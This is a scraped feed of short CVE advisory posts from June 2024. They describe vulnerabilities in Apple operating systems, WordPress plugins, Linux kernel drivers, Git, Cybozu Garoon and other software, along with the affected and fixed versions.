🚨 CVE-2024-27815An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-06-11 08:37:43 |
🚨 CVE-2024-27811The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-11 08:37:42 |
🚨 CVE-2024-27807The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An app may be able to circumvent App Privacy Report logging.🎖@cveNotify |
|
| 2024-06-11 08:37:41 |
🚨 CVE-2024-27806This issue was addressed with improved environment sanitization. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-06-11 08:37:38 |
🚨 CVE-2024-27805An issue was addressed with improved validation of environment variables. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-06-11 08:37:37 |
🚨 CVE-2024-27801The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-11 08:37:36 |
🚨 CVE-2024-27800This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing a maliciously crafted message may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-06-11 08:37:35 |
🚨 CVE-2024-27799This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sonoma 14.5, macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8. An unprivileged app may be able to log keystrokes in other apps including those using secure input mode.🎖@cveNotify |
|
| 2024-06-11 08:37:32 |
🚨 CVE-2024-23282The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.🎖@cveNotify |
|
| 2024-06-11 08:37:31 |
🚨 CVE-2024-23251An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An attacker with physical access may be able to leak Mail account credentials.🎖@cveNotify |
|
| 2024-06-11 08:37:30 |
🚨 CVE-2024-27827This issue was addressed through improved state management. This issue is fixed in macOS Sonoma 14.5. An app may be able to read arbitrary files.🎖@cveNotify |
|
| 2024-06-11 08:37:26 |
🚨 CVE-2024-27818The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An attacker may be able to cause unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-06-11 08:37:25 |
🚨 CVE-2024-27798An authorization issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.5. An attacker may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-11 08:37:24 |
🚨 CVE-2024-27796The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An attacker may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-11 07:37:24 |
🚨 CVE-2024-3549The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the 'b2sSortPostType' parameter in all versions up to, and including, 7.4.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-11 06:37:30 |
🚨 CVE-2024-3723The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.2 via the wp-content/uploads/advanced-cf7-upload directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via this plugin through a form.🎖@cveNotify |
|
| 2024-06-11 06:37:26 |
🚨 CVE-2024-31402Incorrect authorization vulnerability in Cybozu Garoon 5.0.0 to 5.15.2 allows a remote authenticated attacker to delete the data of Shared To-Dos.🎖@cveNotify |
|
| 2024-06-11 06:37:25 |
🚨 CVE-2024-31397Improper handling of extra values issue exists in Cybozu Garoon 5.0.0 to 5.15.2. If this vulnerability is exploited, a user who can log in to the product with the administrative privilege may be able to cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2024-06-11 06:37:24 |
🚨 CVE-2014-0808Authorization bypass through user-controlled key issue exists in EC-CUBE 2.11.0 through 2.12.2 and EC-Orange systems deployed before June 29th, 2015. If this vulnerability is exploited, a user of the affected shopping website may obtain other users' information by sending a crafted HTTP request.🎖@cveNotify |
|
| 2024-06-11 05:37:30 |
🚨 CVE-2024-5530The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +12 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's WL: Product Horizontal Filter widget in all versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 05:37:29 |
🚨 CVE-2024-36360OS command injection vulnerability exists in awkblog v0.0.1 (commit hash:7b761b192d0e0dc3eef0f30630e00ece01c8d552) and earlier. If a remote unauthenticated attacker sends a specially crafted HTTP request, an arbitrary OS command may be executed with the privileges of the affected product on the machine running the product.🎖@cveNotify |
|
| 2024-06-11 05:37:26 |
🚨 CVE-2024-35329libyaml 0.2.5 is vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c.🎖@cveNotify |
|
| 2024-06-11 05:37:25 |
🚨 CVE-2024-31401Cross-site scripting vulnerability in Cybozu Garoon 5.0.0 to 5.15.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script on the web browser of the user who is logging in to the product.🎖@cveNotify |
|
| 2024-06-11 05:37:24 |
🚨 CVE-2024-31400Insertion of sensitive information into sent data issue exists in Cybozu Garoon 5.0.0 to 5.15.0. If this vulnerability is exploited, unintended data may be left in forwarded mail.🎖@cveNotify |
|
| 2024-06-11 04:37:30 |
🚨 CVE-2024-29855Hard-coded JWT secret allows authentication bypass in Veeam Recovery Orchestrator🎖@cveNotify |
|
| 2024-06-11 04:37:26 |
🚨 CVE-2023-7264The Build App Online plugin for WordPress is vulnerable to account takeover due to a weak password reset mechanism in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to reset the password of arbitrary users by guessing an 4-digit numeric reset code.🎖@cveNotify |
|
| 2024-06-11 04:37:25 |
🚨 CVE-2024-4418A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being "freed" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.🎖@cveNotify |
|
| 2024-06-11 04:37:24 |
🚨 CVE-2023-41913strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message.🎖@cveNotify |
|
| 2024-06-11 02:38:04 |
🚨 CVE-2024-37178SAP Financial Consolidation does notsufficiently encode user-controlled inputs, resulting in Cross-Site Scripting(XSS) vulnerability. These endpoints are exposed over the network. Thevulnerability can exploit resources beyond the vulnerable component. Onsuccessful exploitation, an attacker can cause limited impact toconfidentiality of the application.🎖@cveNotify |
|
| 2024-06-11 02:38:03 |
🚨 CVE-2024-37177SAP Financial Consolidation allows data to entera Web application through an untrusted source. These endpoints are exposed overthe network and it allows the user to modify the content from the web site. Onsuccessful exploitation, an attacker can cause significant impact toconfidentiality and integrity of the application.🎖@cveNotify |
|
| 2024-06-11 02:38:02 |
🚨 CVE-2024-37130Dell OpenManage Server Administrator, versions 11.0.1.0 and prior, contains a Local Privilege Escalation vulnerability via XSL Hijacking. A local low-privileged malicious user could potentially exploit this vulnerability and escalate their privilege to the admin user and gain full control of the machine. Exploitation may lead to a complete system compromise.🎖@cveNotify |
|
| 2024-06-11 01:37:33 |
🚨 CVE-2023-49897An OS command injection vulnerability exists in AE1021PE firmware version 2.0.9 and earlier and AE1021 firmware version 2.0.9 and earlier. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.🎖@cveNotify |
|
| 2024-06-11 00:37:32 |
🚨 CVE-2024-22261SQL-Injection in Harbor allows priviledge users to leak the task IDs🎖@cveNotify |
|
| 2024-06-10 23:37:24 |
🚨 CVE-2022-37019Potential vulnerabilities have been identified in the system BIOS for certain HP PC products which may allow escalation of privileges and code execution. HP is releasing firmware updates to mitigate the potential vulnerabilities.🎖@cveNotify |
|
| 2024-06-10 22:37:32 |
🚨 CVE-2024-36304A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One and Apex One as a Service agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-06-10 22:37:26 |
🚨 CVE-2024-36303An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This vulnerability is similar to, but not identical to, CVE-2024-36302.🎖@cveNotify |
|
| 2024-06-10 22:37:25 |
🚨 CVE-2024-35241Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.🎖@cveNotify |
|
| 2024-06-10 22:37:24 |
🚨 CVE-2024-32849Trend Micro Security 17.x (Consumer) is vulnerable to a Privilege Escalation vulnerability that could allow a local attacker to unintentionally delete privileged Trend Micro files including its own.🎖@cveNotify |
|
| 2024-06-10 21:37:43 |
🚨 CVE-2024-27817The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-06-10 21:37:42 |
🚨 CVE-2024-27814This issue was addressed through improved state management. This issue is fixed in watchOS 10.5. A person with physical access to a device may be able to view contact information from the lock screen.🎖@cveNotify |
|
| 2024-06-10 21:37:41 |
🚨 CVE-2024-27811The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-10 21:37:37 |
🚨 CVE-2024-27807The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An app may be able to circumvent App Privacy Report logging.🎖@cveNotify |
|
| 2024-06-10 21:37:36 |
🚨 CVE-2024-27805An issue was addressed with improved validation of environment variables. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-06-10 21:37:35 |
🚨 CVE-2024-27802An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-06-10 21:37:32 |
🚨 CVE-2024-27801The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-10 21:37:31 |
🚨 CVE-2024-27799This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sonoma 14.5, macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8. An unprivileged app may be able to log keystrokes in other apps including those using secure input mode.🎖@cveNotify |
|
| 2024-06-10 21:37:30 |
🚨 CVE-2024-23251An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An attacker with physical access may be able to leak Mail account credentials.🎖@cveNotify |
|
| 2024-06-10 21:37:26 |
🚨 CVE-2023-45922glx_pbuffer.c in Mesa 23.0.4 was discovered to contain a segmentation violation when calling __glXGetDrawableAttribute(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-06-10 21:37:25 |
🚨 CVE-2018-18290An issue was discovered in nc-cms through 2017-03-10. index.php?action=edit_html&name=home_content allows XSS via the HTML Source Editor. NOTE: the vendor disputes this because the form requires administrator privileges, and entering JavaScript is supported functionality🎖@cveNotify |
|
| 2024-06-10 21:37:24 |
🚨 CVE-2018-16310Technicolor TG588V V2 devices allow remote attackers to cause a denial of service (networking outage) via a flood of random MAC addresses, as demonstrated by macof. NOTE: this might overlap CVE-2018-15852 and CVE-2018-15907. NOTE: Technicolor denies that the described behavior is a vulnerability and states that Wi-Fi traffic is slowed or stopped only while the devices are exposed to a MAC flooding attack. This has been confirmed through testing against official up-to-date versions🎖@cveNotify |
|
| 2024-06-10 21:07:38 |
🚨 CVE-2022-32897A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.5. Processing a maliciously crafted tiff file may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-10 21:07:31 |
🚨 CVE-2024-36410SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions prior to 7.14.4 and 8.6.1, poor input validation allows for SQL Injection in EmailUIAjax messages count controller. Versions 7.14.4 and 8.6.1 contain a fix for this issue.🎖@cveNotify |
|
| 2024-06-10 21:07:30 |
🚨 CVE-2024-32871Pimcore is an Open Source Data & Experience Management Platform. The Pimcore thumbnail generation can be used to flood the server with large files. By changing the file extension or scaling factor of the requested thumbnail, attackers can create files that are much larger in file size than the original. This vulnerability is fixed in 11.2.4.🎖@cveNotify |
|
| 2024-06-10 21:07:29 |
🚨 CVE-2024-35629Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Wow-Company Easy Digital Downloads – Recent Purchases allows PHP Remote File Inclusion.This issue affects Easy Digital Downloads – Recent Purchases: from n/a through 1.0.2.🎖@cveNotify |
|
| 2024-06-10 21:07:26 |
🚨 CVE-2024-34792Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in dexta Dextaz Ping allows Command Injection.This issue affects Dextaz Ping: from n/a through 0.65.🎖@cveNotify |
|
| 2024-06-10 21:07:25 |
🚨 CVE-2024-34551Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Select-Themes Stockholm allows PHP Local File Inclusion.This issue affects Stockholm: from n/a through 9.6.🎖@cveNotify |
|
| 2024-06-10 21:07:24 |
🚨 CVE-2024-34384Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in SinaExtra Sina Extension for Elementor allows PHP Local File Inclusion.This issue affects Sina Extension for Elementor: from n/a through 3.5.1.🎖@cveNotify |
|
| 2024-06-10 20:37:31 |
🚨 CVE-2023-40389The issue was addressed with improved restriction of data container access. This issue is fixed in macOS Ventura 13.6.5, macOS Monterey 12.7.4. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-06-10 20:37:30 |
🚨 CVE-2022-48578An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.5. Processing an AppleScript may result in unexpected termination or disclosure of process memory.🎖@cveNotify |
|
| 2024-06-10 20:37:26 |
🚨 CVE-2022-32897A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.5. Processing a maliciously crafted tiff file may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-10 20:37:25 |
🚨 CVE-2024-35654Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CyberChimps Responsive allows Stored XSS.This issue affects Responsive: from n/a through 5.0.3.🎖@cveNotify |
|
| 2024-06-10 20:37:24 |
🚨 CVE-2024-35634Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Wow-Company Woocommerce – Recent Purchases allows PHP Local File Inclusion.This issue affects Woocommerce – Recent Purchases: from n/a through 1.0.1.🎖@cveNotify |
|
| 2024-06-10 20:07:24 |
🚨 CVE-2024-36400nano-id is a unique string ID generator for Rust. Affected versions of the nano-id crate incorrectly generated IDs using a reduced character set in the `nano_id::base62` and `nano_id::base58` functions. Specifically, the `base62` function used a character set of 32 symbols instead of the intended 62 symbols, and the `base58` function used a character set of 16 symbols instead of the intended 58 symbols. Additionally, the `nano_id::gen` macro is also affected when a custom character set that is not a power of 2 in size is specified. It should be noted that `nano_id::base64` is not affected by this vulnerability. This can result in a significant reduction in entropy, making the generated IDs predictable and vulnerable to brute-force attacks when the IDs are used in security-sensitive contexts such as session tokens or unique identifiers. The vulnerability is fixed in 0.4.0.🎖@cveNotify |
|
| 2024-06-10 19:37:45 |
🚨 CVE-2021-47550In the Linux kernel, the following vulnerability has been resolved:drm/amd/amdgpu: fix potential memleakIn function amdgpu_get_xgmi_hive, when kobject_init_and_add failedThere is a potential memleak if not call kobject_put.🎖@cveNotify |
|
| 2024-06-10 19:37:44 |
🚨 CVE-2024-32004Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.🎖@cveNotify |
|
| 2024-06-10 19:37:43 |
🚨 CVE-2024-23229This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Monterey 12.7.5, macOS Ventura 13.6.5, macOS Sonoma 14.4. A malicious application may be able to access Find My data.🎖@cveNotify |
|
| 2024-06-10 19:37:39 |
🚨 CVE-2024-3089A vulnerability has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/manage-ambulance.php of the component Manage Ambulance Page. The manipulation of the argument del leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258682 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-10 19:37:38 |
🚨 CVE-2024-2214In Eclipse ThreadX before version 6.4.0, the _Mtxinit() function in the Xtensa port was missing an array size check causing a memory overwrite. The affected file was ports/xtensa/xcc/src/tx_clib_lock.c🎖@cveNotify |
|
| 2024-06-10 19:37:37 |
🚨 CVE-2024-25941The jail(2) system call has not limited a visiblity of allocated TTYs (the kern.ttys sysctl). This gives rise to an information leak about processes outside the current jail.Attacker can get information about TTYs allocated on the host or in other jails. Effectively, the information printed by "pstat -t" may be leaked.🎖@cveNotify |
|
| 2024-06-10 19:37:33 |
🚨 CVE-2024-0567A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack.🎖@cveNotify |
|
| 2024-06-10 19:37:32 |
🚨 CVE-2020-36639A vulnerability has been found in AlliedModders AMX Mod X on Windows and classified as critical. This vulnerability affects the function cmdVoteMap of the file plugins/adminvote.sma of the component Console Command Handler. The manipulation of the argument amx_votemap leads to path traversal. The patch is identified as a5f2b5539f6d61050b68df8b22ebb343a2862681. It is recommended to apply a patch to fix this issue. VDB-217354 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-10 19:37:31 |
🚨 CVE-2022-30284In the python-libnmap package through 0.7.2 for Python, remote command execution can occur (if used in a client application that does not validate arguments). NOTE: the vendor believes it would be unrealistic for an application to call NmapProcess with arguments taken from input data that arrived over an untrusted network, and thus the CVSS score corresponds to an unrealistic use case. None of the NmapProcess documentation implies that this is an expected use case🎖@cveNotify |
|
| 2024-06-10 19:37:30 |
🚨 CVE-2021-45007Plesk 18.0.37 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows an attacker to insert data on the user and admin panel. NOTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users🎖@cveNotify |
|
| 2024-06-10 19:37:26 |
🚨 CVE-2018-11804Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build. Note that this issue does not affect end users of Spark, only developers building Spark from source code.🎖@cveNotify |
|
| 2024-06-10 19:37:25 |
🚨 CVE-2018-11770From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.🎖@cveNotify |
|
| 2024-06-10 19:07:37 |
🚨 CVE-2021-47526In the Linux kernel, the following vulnerability has been resolved:serial: liteuart: Fix NULL pointer dereference in ->remove()drvdata has to be set in _probe() - otherwise platform_get_drvdata()causes null pointer dereference BUG in _remove().🎖@cveNotify |
|
| 2024-06-10 19:07:36 |
🚨 CVE-2021-47525In the Linux kernel, the following vulnerability has been resolved:serial: liteuart: fix use-after-free and memleak on unbindDeregister the port when unbinding the driver to prevent it from beingused after releasing the driver data and leaking memory allocated byserial core.🎖@cveNotify |
|
| 2024-06-10 19:07:32 |
🚨 CVE-2021-47521In the Linux kernel, the following vulnerability has been resolved:can: sja1000: fix use after free in ems_pcmcia_add_card()If the last channel is not available then "dev" is freed. Fortunately,we can just use "pdev->irq" instead.Also we should check if at least one channel was set up.🎖@cveNotify |
|
| 2024-06-10 19:07:31 |
🚨 CVE-2021-47519In the Linux kernel, the following vulnerability has been resolved:can: m_can: m_can_read_fifo: fix memory leak in error branchIn m_can_read_fifo(), if the second call to m_can_fifo_read() fails,the function jump to the out_fail label and returns without callingm_can_receive_skb(). This means that the skb previously allocated byalloc_can_skb() is not freed. In other terms, this is a memory leak.This patch adds a goto label to destroy the skb if an error occurs.Issue was found with GCC -fanalyzer, please follow the link below fordetails.🎖@cveNotify |
|
| 2024-06-10 19:07:30 |
🚨 CVE-2021-47518In the Linux kernel, the following vulnerability has been resolved:nfc: fix potential NULL pointer deref in nfc_genl_dump_ses_doneThe done() netlink callback nfc_genl_dump_ses_done() should check ifreceived argument is non-NULL, because its allocation could fail earlierin dumpit() (nfc_genl_dump_ses()).🎖@cveNotify |
|
| 2024-06-10 19:07:26 |
🚨 CVE-2021-47513In the Linux kernel, the following vulnerability has been resolved:net: dsa: felix: Fix memory leak in felix_setup_mmio_filteringAvoid a memory leak if there is not a CPU port defined.Addresses-Coverity-ID: 1492897 ("Resource leak")Addresses-Coverity-ID: 1492899 ("Resource leak")🎖@cveNotify |
|
| 2024-06-10 19:07:25 |
🚨 CVE-2024-33764lunasvg v2.3.9 was discovered to contain a stack-overflow at lunasvg/source/element.h.🎖@cveNotify |
|
| 2024-06-10 19:07:24 |
🚨 CVE-2024-3567A flaw was found in QEMU. An assertion failure was present in the update_sctp_checksum() function in hw/net/net_tx_pkt.c when trying to calculate the checksum of a short-sized fragmented packet. This flaw allows a malicious guest to crash QEMU and cause a denial of service condition.🎖@cveNotify |
|
| 2024-06-10 18:37:37 |
🚨 CVE-2023-5752When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.🎖@cveNotify |
|
| 2024-06-10 18:37:34 |
🚨 CVE-2021-46312An issue was discovered IW44EncodeCodec.cpp in djvulibre 3.5.28 in allows attackers to cause a denial of service via divide by zero.🎖@cveNotify |
|
| 2024-06-10 18:37:33 |
🚨 CVE-2023-20588A division-by-zero error on some AMD processors can potentially return speculative data resulting in loss of confidentiality.🎖@cveNotify |
|
| 2024-06-10 18:37:32 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2024-06-10 18:37:31 |
🚨 CVE-2023-32067c-ares is an asynchronous resolver library. c-ares is vulnerable to denial of service. If a target resolver sends a query, the attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver. The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. This issue has been patched in version 1.19.1.🎖@cveNotify |
|
| 2024-06-10 18:37:27 |
🚨 CVE-2022-39253Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`.🎖@cveNotify |
|
| 2024-06-10 18:37:26 |
🚨 CVE-2022-37177HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm. NOTE: this is disputed by the vendor for multiple reasons, e.g., it is inconsistent with CVE ID assignment rules for cloud services, and no product with version V1.0 exists. Furthermore, the rail-fence cipher has been removed, and TLS 1.2 is now used for encryption.🎖@cveNotify |
|
| 2024-06-10 18:07:31 |
🚨 CVE-2022-45176An issue was discovered in LIVEBOX Collaboration vDesk through v018. Stored Cross-site Scripting (XSS) can occur under the /api/v1/getbodyfile endpoint via the uri parameter. The web application (through its vShare functionality section) doesn't properly check parameters, sent in HTTP requests as input, before saving them on the server. In addition, crafted JavaScript content can then be reflected back to the end user and executed by the web browser.🎖@cveNotify |
|
| 2024-06-10 18:07:30 |
🚨 CVE-2024-5785Command injection vulnerability in Comtrend router WLD71-T1_v2.0.201820, affecting the GRG-4280us version. This vulnerability could allow an authenticated user to execute commands inside the router by making a POST request to the URL “/boaform/admin/formUserTracert”.🎖@cveNotify |
|
| 2024-06-10 18:07:29 |
🚨 CVE-2024-36405liboqs is a C-language cryptographic library that provides implementations of post-quantum cryptography algorithms. A control-flow timing lean has been identified in the reference implementation of the Kyber key encapsulation mechanism when it is compiled with Clang 15-18 for `-Os`, `-O1`, and other compilation options. A proof-of-concept local attack on the reference implementation leaks the entire ML-KEM 512 secret key in ~10 minutes using end-to-end decapsulation timing measurements. The issue has been fixed in version 0.10.1. As a possible workaround, some compiler options may produce vectorized code that does not leak secret information, however relying on these compiler options as a workaround may not be reliable.🎖@cveNotify |
|
| 2024-06-10 17:37:44 |
🚨 CVE-2023-42861A logic issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1. An attacker with knowledge of a standard user's credentials can unlock another standard user's locked screen on the same Mac.🎖@cveNotify |
|
| 2024-06-10 17:37:43 |
